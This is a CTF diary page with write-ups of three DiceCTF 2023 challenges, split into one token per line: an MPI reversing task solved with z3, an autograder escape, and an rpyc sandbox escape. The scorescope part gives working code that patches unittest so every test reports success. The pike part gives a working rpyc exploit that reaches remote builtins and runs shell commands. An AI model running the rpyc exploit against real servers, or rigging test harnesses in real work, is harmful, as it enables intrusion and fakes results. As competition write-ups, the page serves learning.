Page Menu
Home
desp's stash
Search
Configure Global Search
Log In
Files
F369122
dice23.md
No One
Temporary
Actions
Download File
Edit File
Delete File
View Transforms
Subscribe
Mute Notifications
Award Token
Flag For Later
Size
13 KB
Subscribers
None
dice23.md
View Options
###
parallelism
woo
first
flag
in
another
month
and
a
half
again
everyones
just
burnt
out
from
organizing
sapling
lmao
so
im
just
looking
at
easy
challs
myself
too
*
*
*
ngl
this
one
is
just
reading
MPI
docs
lmao
i
didnt
have
mpirun
set
up
,
so
i
just
ended
up
statically
reversing
the
entire
thing
which
wasnt
that
bad
actually
theres
only
really
3
functions
in
question
:
-
first
reads
the
flag
as
root
process
,
scramble
it
,
and
then
scatters
it
to
the
rest
of
the
processes
via
`
MPI_scatter
`
-
on
first
glance
i
thought
the
second
one
was
just
an
artifical
delay
of
some
sorts
since
all
it
does
it
basically
just
sending
and
recving
then
syncing
up
,
but
on
closer
look
they
are
swapping
between
processes
-
third
one
gathers
back
the
flag
and
checks
it
against
the
string
as
root
process
,
and
does
nothing
as
other
processes
so
its
just
a
matter
of
rewriting
the
program
in
python
without
all
the
interprocess
communciation
overheads
then
except
i
kept
brainfarting
and
somehow
thought
`
#!
py
print
(
""
.
join
([
'
m_ERpmfrNkekU4_4asI_Tra1e_4l_c4_GCDlryidS3
{
Ptsu9i
}
13
Es4V73M4_ans
'
[
s
[
i
]]
for
i
in
range
(
64
)]))
`
would
give
me
the
correctly
inversed
flag
if
`
s
`
is
the
scrambled
index
lmao
then
i
went
on
a
rabbit
hole
figuring
out
where
exactly
i
did
the
swapping
wrong
scrutinizing
every
single
detail
in
the
MPI
docs
and
trying
out
like
4
different
variations
of
my
swapping
from
doing
it
in
parallel
to
making
a
multidimensional
array
to
ensure
im
not
making
arithmetic
mistakes
on
the
array
indices
and
then
i
finally
gave
up
and
used
z3
which
instantly
spewed
out
the
flag
:
clown
:
`
dice
{
P4ral1isM_m4kEs_eV3ryt4InG_sUp3r_f4ST_aND_s3CuRE_a17m4k9l4
}
`
moral
of
the
story
:
i
am
not
to
be
trusted
when
it
comes
to
math
*
at
all
*
```
py
from
functools
import
reduce
from
z3
import
*
sol
=
Solver
()
#
s
=
list
(
range
(
64
))
#
inverse
operations
are
not
my
forte
:
'
)
thanks
z3
s
=
[
BitVec
(
f
'
char
{
i
}
'
,
8
)
for
i
in
range
(
64
)]
orig
=
[
v
for
v
in
s
]
v3
=
[
None
]*
32
v3
[
0
]
=
26
v3
[
1
]
=
32
v3
[
2
]
=
14
v3
[
3
]
=
11
v3
[
4
]
=
3
v3
[
5
]
=
1
v3
[
6
]
=
32
v3
[
7
]
=
24
v3
[
8
]
=
13
v3
[
9
]
=
17
v3
[
10
]
=
3
v3
[
11
]
=
17
v3
[
12
]
=
2
v3
[
13
]
=
13
v3
[
14
]
=
19
v3
[
15
]
=
6
v3
[
16
]
=
12
v3
[
17
]
=
22
v3
[
18
]
=
3
v3
[
19
]
=
30
v3
[
20
]
=
10
v3
[
21
]
=
6
v3
[
22
]
=
8
v3
[
23
]
=
26
v3
[
24
]
=
6
v3
[
25
]
=
22
v3
[
26
]
=
13
v3
[
27
]
=
1
v3
[
28
]
=
19
v3
[
29
]
=
1
v3
[
30
]
=
1
v3
[
31
]
=
29
#
initial
scramble
in
the
first
function
for
i
in
range
(
32
):
s
[
i
],
s
[
v3
[
i
]
+
31
]
=
s
[
v3
[
i
]
+
31
],
s
[
i
]
#
"scatter"
it
into
a
two
dimension
array
s
=
[
s
[
i
:
i
+
8
]
for
i
in
range
(
0
,
len
(
s
),
8
)]
for
i
in
range
(
10000
):
#
swap
all
8
in
parallel
recv
=
[
s
[((((
j
+
i
)
%
8
)
+
8
)
%
8
)][(
i
%
8
)]
for
j
in
range
(
8
)]
for
j
in
range
(
8
):
s
[
j
][(
i
%
8
)]
=
recv
[
j
]
#
gather
(
flatten
it
back
down
)
s
=
reduce
(
list
.
__add__
,
s
)
#
now
we
can
constraint
and
solve
for
the
scrambled
characters
for
i
,
v
in
enumerate
(
s
):
sol
.
add
(
v
==
b
'
m_ERpmfrNkekU4_4asI_Tra1e_4l_c4_GCDlryidS3
{
Ptsu9i
}
13
Es4V73M4_ans
'
[
i
])
print
(
s
)
sol
.
check
()
model
=
sol
.
model
()
for
i
in
orig
:
if
str
(
model
[
i
])
!=
'
None
'
:
print
(
chr
(
int
(
str
(
model
[
i
]))),
end
=
''
)
print
()
```
###
scorescope
eyo
something
familiar
to
me
lets
go
??
~~
totally
not
something
ive
been
doing
to
my
own
courses
'
autograders
~~
except
this
one
highkey
is
easier
than
the
hurdles
prairielearn
and
the
likes
brings
me
through
tho
lmao
we
get
arbitrary
leaks
just
by
returning
the
value
(
albeit
truncated
),
and
theres
no
restrictions
on
whatever
imports
we
need
so
logically
the
first
thing
to
do
is
to
traverse
the
stack
since
apparently
all
of
these
autograders
basically
runs
in
the
same
process
for
some
reason
lol
~~
like
interprocess
communication
and
isolation
between
graders
and
runners
wouldve
been
a
much
better
design
choice
to
prevent
grade
modifications
but
ok
~~
anyways
it
seems
like
most
of
the
useful
variables
is
in
the
second
previous
frame
,
so
after
a
lot
of
`
str
(
inspect
.
currentframe
().
f_back
.
f_back
.
f_globals
.
keys
())[:
64
]
`
,
`
[
64
:
128
]
`
,
`
[
128
:
192
]
`
etc
etc
to
leak
the
data
out
by
chunks
to
bypass
the
truncation
i
mentioned
before
i
finally
...
got
fed
up
with
the
inefficiency
:
upside_down
:
which
funnily
enough
is
also
when
i
saw
`
_common_shorten_repr
`
which
sounds
suspiciously
like
its
responsible
for
the
truncation
and
so
nooping
it
i
go
:
`
#!
py
inspect
.
currentframe
().
f_back
.
f_back
.
f_globals
[
'
_common_shorten_repr
'
]
=
lambda
*
str
:
str
`
originally
i
guessed
`
#!
py
lambda
str
:
str
`
,
but
that
ended
up
spewing
arcane
errors
about
format
string
having
not
enough
parameters
lmao
so
i
just
let
made
it
vararg
instead
and
ey
i
was
correct
now
we
can
leak
things
much
faster
than
having
to
stitch
together
chunks
after
multiple
runs
the
next
thing
that
caught
my
eyes
is
`
TestCase
`
-
this
is
just
from
the
builtin
`
unittest
`
module
aint
it
for
it
to
be
here
it
probably
means
they
are
using
it
to
run
the
tests
,
so
what
if
we
just
make
all
the
assertions
on
it
succeed
and
with
the
following
code
```
py
#
TestCase
is
just
python
unittests
,
we
can
set
assert
*
to
True
to
pass
all
assertions
inspect
.
currentframe
().
f_back
.
f_back
.
f_globals
[
'
TestCase
'
].
assertEqual
=
lambda
*
_
:
True
keys
=
[
i
for
i
in
dir
(
inspect
.
currentframe
().
f_back
.
f_back
.
f_globals
[
'
TestCase
'
])
if
'
assert
'
in
i
]
for
key
in
keys
:
setattr
(
inspect
.
currentframe
().
f_back
.
f_back
.
f_globals
[
'
TestCase
'
],
key
,
lambda
*
_
:
True
)
```
it
actually
somewhat
worked
except
a
lot
of
the
other
test
cases
are
still
complaining
about
wrong
format
lmao
so
just
nooping
the
assertions
arent
enough
we
need
to
noop
the
entire
test
case
after
reading
on
how
`
TestCase
`
works
for
a
bit
i
realized
all
test
cases
have
to
go
through
the
`
run
`
entrypoint
so
what
if
we
just
noop
that
instead
turns
out
its
slightly
more
complicated
than
just
a
`
lambda
res
:
None
`
lmao
we
need
to
get
the
actual
test
cases
which
subclasses
`
util
.
TestCase
`
,
and
also
set
the
`
TestResult
`
object
to
success
so
with
```
py
def
run
(
self
,
result
):
result
.
addSuccess
(
self
)
return
result
classes
=
inspect
.
currentframe
().
f_back
.
f_back
.
f_globals
[
'
TestCase
'
].
__subclasses__
()[-
1
].
__subclasses__
()
for
cls
in
classes
:
cls
.
run
=
run
#
replace
run
with
one
that
always
return
success
to
the
testresult
```
it
finally
works
eyy
except
for
the
`
test_add_mixed
`
case
for
some
reason
so
i
just
manually
did
the
actual
thing
they
expected
and
got
the
flag
lmfao
`
dice
{
still_more_secure_than_gradescope
}
`
is
it
tho
```
py
#
DICE
1001
#
Homework
3
#
#
@
author
[
full
name
]
#
@
student_id
[
student
id
]
#
#
Collaborators
:
#
-
[
list
collaborators
here
]
#
#
Resources
:
#
-
[
list
resources
consulted
]
def
add
(
a
,
b
):
'''
Return
the
sum
of
a
and
b
.
Parameters
:
a
(
int
):
The
first
number
to
add
.
b
(
int
):
The
second
number
to
add
.
Returns
:
int
:
The
sum
of
a
and
b
.
'''
########
YOUR
CODE
########
#
owo
shorten
repr
probably
can
be
replaced
to
remove
that
annoying
truncation
import
inspect
inspect
.
currentframe
().
f_back
.
f_back
.
f_globals
[
'
_common_shorten_repr
'
]
=
lambda
*
str
:
str
def
run
(
self
,
result
):
result
.
addSuccess
(
self
)
return
result
classes
=
inspect
.
currentframe
().
f_back
.
f_back
.
f_globals
[
'
TestCase
'
].
__subclasses__
()[-
1
].
__subclasses__
()
for
cls
in
classes
:
cls
.
run
=
run
#
replace
run
with
one
that
always
return
success
to
the
testresult
return
a
+
b
#
to
fix
the
mixed
case
which
aint
affected
by
changing
testcases
at
all
for
some
reason
###########################
def
longest
(
words
):
'''
Return
the
longest
word
in
a
list
of
words
.
When
there
are
multiple
words
of
the
same
length
,
return
the
first
.
Parameters
:
words
(
list
):
A
list
of
words
.
Returns
:
str
:
The
longest
word
in
the
list
.
'''
########
YOUR
CODE
########
#
code
leftover
from
leaking
chunk
by
chunk
in
parallel
#
each
truncation
happens
close
to
after
64
chars
,
so
we
trunc
by
64
and
print
it
in
parallel
to
try
speeding
things
up
import
inspect
return
str
(
inspect
.
currentframe
().
f_back
.
f_back
.
f_globals
.
keys
())[
128
+
128
+
64
:
128
+
128
+
128
]
###########################
#
omitted
the
rest
of
the
functions
(
which
are
just
noops
)
for
brevity
```
###
pike
lol
this
actually
took
me
quite
a
bit
of
time
for
the
amount
of
solves
it
has
like
how
does
this
have
more
solves
than
scorescope
i
guess
im
just
bad
at
reading
docs
and
src
efficiently
lmao
had
to
dig
for
the
vuln
for
quite
a
bit
before
realizing
`
HANDLE_CMP
`
is
insecure
being
the
only
location
where
getattr
is
not
protected
i
was
originally
just
doing
it
the
normal
way
and
hoping
unlike
normal
pickles
rpyc
can
transport
code
across
to
remote
so
something
like
this
would
work
```
py
class
test
():
def
__add__
(
self
,
b
):
breakpoint
()
return
subprocess
.
Popen
(
'
dir
'
,
shell
=
True
,
stdout
=
subprocess
.
PIPE
).
communicate
()
print
(
conn
.
root
.
exposed_add
(
test
(),
test
()))
```
even
tried
to
nudge
rpyc
to
send
the
code
to
remote
with
no
avail
lol
```
py
class
metatest
(
type
):
def
__add__
(
self
,
b
):
import
subprocess
breakpoint
()
#
if
its
local
i
will
see
instantly
on
my
current
terminal
-
just
for
ease
of
local
debugging
since
cwd
is
same
for
server
and
client
and
its
hard
to
tell
return
subprocess
.
Popen
(
'
dir
'
,
shell
=
True
,
stdout
=
subprocess
.
PIPE
).
communicate
()
class
test
(
metaclass
=
metatest
):
def
__init__
(
self
)
->
None
:
import
sys
self
.
sys
=
sys
print
(
conn
.
root
.
exposed_add
(
test
,
test
))
```
coz
i
thought
what
if
they
only
accounted
for
normal
usage
of
functions
so
cases
like
these
would
be
tricked
into
calling
the
local
versions
of
the
objects
instead
of
netrefs
but
no
its
not
how
it
works
so
since
it
seems
like
normal
use
cases
wont
be
able
to
trigger
code
execution
on
remote
its
time
to
dig
deep
into
the
src
it
turns
out
theres
a
netref
class
in
`
netref
.
py
`
that
basically
proxies
all
remote
objects
'
functions
back
to
remote
through
a
few
handlers
in
`
protocol
.
py
`
which
means
all
local
references
execute
on
local
since
on
remote
they
just
become
a
netref
so
they
just
bounce
back
to
run
the
code
on
local
(
and
vice
versa
too
-
all
remote
references
will
stay
in
remote
land
,
but
we
cant
really
access
remote
references
since
getattr
is
locked
down
)
since
it
seems
like
there
aint
much
we
can
do
with
the
netrefs
themselves
,
i
started
digging
deep
into
the
protocol
handlers
,
which
all
seemed
pretty
secure
in
the
`
DEFAULT_CONFIG
`
sense
-
until
i
found
`
HANDLE_CMP
`
which
just
called
`
#!
py
return
getattr
(
type
(
obj
),
op
)(
obj
,
other
)
`
for
some
reason
so
i
started
thinking
if
theres
any
attr
we
can
leak
that
will
help
us
leak
more
which
*
also
*
has
the
property
of
accepting
2
parameters
-
and
it
turns
out
`
__getattr__
`
does
exactly
that
except
`
__getattr__
`
actually
just
bounces
everything
back
into
local
:
```
py
def
__getattr__
(
self
,
name
):
if
name
in
DELETED_ATTRS
:
raise
AttributeError
()
return
syncreq
(
self
,
consts
.
HANDLE_GETATTR
,
name
)
```
BUT
`
__getattribute__
`
DOES
get
the
local
attributes
specified
in
the
`
LOCAL_ATTRS
`
dict
which
includes
most
useful
things
like
`
__class__
`
and
`
__dict__
`
now
we
can
finally
leak
remote
references
that
are
not
netrefs
out
into
our
client
,
which
once
we
have
them
should
allow
us
to
stay
in
remote
land
we
still
need
to
continue
using
this
vulnerable
`
getattr
`
method
instead
of
directly
`
obj
.
attr
`
ing
which
will
use
the
secure
`
HANDLE_GETATTR
`
handler
though
,
but
the
idea
stays
the
same
as
most
basic
pyjails
with
that
,
we
can
get
arbitrary
code
execution
on
remote
,
and
the
flag
:
`
dice
{
pyj41l_w1th_4_tw15t
}
`
```
py
import
rpyc
from
rpyc
.
core
import
consts
#
the
idea
is
that
once
you
get
a
remote
reference
,
you
can
stay
in
remote
land
since
all
calls
will
be
directed
back
to
remote
#
however
getting
that
remote
reference
in
the
first
place
is
quite
annoying
since
most
useful
attributes
are
either
blocked
or
local
#
and
theres
not
really
a
way
to
differentiate
between
those
unless
you
dive
into
rpyc
src
#
also
any
local
references
(
e
.
g
.
import
os
;
os
.
system
is
a
local
reference
that
will
end
up
running
on
our
local
machine
;
a
local
definition
of
a
class
with
modified
__add__
to
trick
remote
to
run
will
also
not
work
since
it
will
bounce
back
to
local
when
we
do
conn
.
root
.
add
())
#
will
end
up
bouncing
back
to
local
so
the
entrypoint
has
to
be
conn
.
root
since
that
'
s
the
only
remote
reference
at
start
def
remote_getattr
(
obj
,
name
):
#
abuses
the
fact
that
CMP
is
the
only
one
that
doesnt
have
a
secure
check
but
directly
uses
getattr
#
also
abuses
the
fact
that
__getattribute__
bypasses
netref
calls
for
certain
local
attrs
so
we
dont
bounce
back
to
client
return
conn
.
sync_request
(
consts
.
HANDLE_CMP
,
obj
,
name
,
'
__getattribute__
'
)
def
remote_setattr
(
obj
,
name
,
value
):
conn
.
sync_request
(
consts
.
HANDLE_CMP
,
obj
,
'
__setattr__
'
,
'
__getattribute__
'
)(
'
exposed_
'
+
name
,
value
)
#
exposed_
bypasses
restrictions
conn
=
rpyc
.
connect
(
'
127.0
.
0.1
'
,
port
=
1337
)
#
we
can
directly
do
remote_func
()
since
__call__
directly
calls
netref
request
,
and
is
not
restricted
unlike
getattr
or
setattr
#
manual
index
coz
iterating
through
the
string
of
the
classes
ends
up
being
way
too
slow
remote_wrap_close
=
remote_getattr
(
remote_getattr
(
remote_getattr
(
remote_getattr
(
conn
.
root
,
'
__class__
'
),
'
__base__
'
),
'
__base__
'
),
'
__subclasses__
'
)()[
140
]
print
(
remote_wrap_close
)
#
we
couldve
used
wrap_close
'
s
os
.
system
instead
,
but
we
cant
exfil
the
data
from
that
so
we
go
the
long
way
and
use
subprocess
instead
import
subprocess
#
we
can
use
local
import
coz
PIPE
itself
is
just
a
single
int
value
remote_popen
=
remote_getattr
(
remote_getattr
(
remote_getattr
(
remote_wrap_close
,
'
__init__
'
),
'
__globals__
'
)[
'
__builtins__
'
][
'
__import__
'
](
'
subprocess
'
),
'
Popen
'
)
print
(
remote_getattr
(
remote_popen
(
'
cat
flag
.
txt
'
,
shell
=
True
,
stdout
=
subprocess
.
PIPE
),
'
communicate
'
)())
```
also
unrelated
:
wsl
port
forward
messed
with
my
local
/
remote
debug
setup
apparently
lmao
and
it
seems
like
rpyc
requires
same
(
major
?)
version
to
run
correctly
?
i
was
on
5.1
.
0
which
just
kept
giving
me
connection
closed
by
peer
this
bug
apparently
is
patched
in
the
version
i
had
in
my
python
installation
so
im
just
glad
i
got
stuck
connecting
to
remote
and
downgraded
to
4.1
.
0
before
digging
into
the
src
lmao
or
else
i
'
d
probably
be
malding
over
how
theres
no
entrypoints
for
me
to
exploit
at
all
kekw
File Metadata
Details
Attached
Mime Type
text/x-python
Expires
Sun, Jul 6, 5:10 PM (1 d, 4 h)
Storage Engine
local-disk
Storage Format
Raw Data
Storage Handle
f8/1c/db87abf0dad649a86cdb6301bd00
Attached To
rCTFD CTF diary
Event Timeline
Log In to Comment